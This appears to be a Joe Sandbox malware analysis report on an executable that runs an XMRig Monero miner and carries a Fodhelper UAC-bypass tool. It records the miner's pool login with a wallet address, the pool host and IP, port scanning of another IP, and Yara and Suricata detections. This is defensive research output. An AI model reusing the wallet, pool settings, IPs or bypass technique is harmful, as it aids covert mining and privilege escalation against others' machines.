        Source: Yara matchFile source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
        Detected Stratum mining protocol
        Source: global trafficTCP traffic: 192.168.2.10:54464 -> 45.76.89.70:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66 37 6b 56 48 46 57 73 38 62 70 72 51 4a 70 4d 50 78 44 63 52 78 36 52 54 51 78 5a 57 37 72 42 79 69 58 55 34 43 6e 4d 44 71 72 48 4c 34 73 37 56 45 70 4d 47 38 51 6a 37 37 79 67 64 44 52 76 6b 42 55 33 4e 63 64 31 57 78 22 2c 22 70 61 73 73 22 3a 22 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 35 2e 32 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 61 73 74 72 6f 62 77 74 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
        Found strings related to Crypto-Mining
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
        Source: e7WMhx18XN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: e7WMhx18XN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: AC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

        Networking

        barindex
        Connects to many ports of the same IP (likely port scanning)
        Source: global trafficTCP traffic: 147.185.221.22 ports 2,4,5,7,54872,8
        Source: global trafficTCP traffic: 192.168.2.10:54593 -> 147.185.221.22:54872
        Source: Joe Sandbox ViewIP Address: 45.76.89.70 45.76.89.70
        Source: Joe Sandbox ViewIP Address: 147.185.221.22 147.185.221.22
        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
        Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.10:58455 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.10:54464 -> 45.76.89.70:80
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000038.00000002.1931071513.0000000002DC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1992736988.0000000003357000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1997379038.0000000003807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft
        Source: powershell.exe, 00000038.00000002.1931658908.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft6#ZQ
        Source: conhost.exe, 00000014.00000002.1399936831.00000113DCE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: svchost.exe, 00000000.00000002.1367337795.0000010D91A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
        Source: powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
        Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
        Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
        Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
        Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
        Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
        Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
        Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
        Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
        Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
        Source: svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
        Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
        Source: svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1366018989.0000010D91A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367429694.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
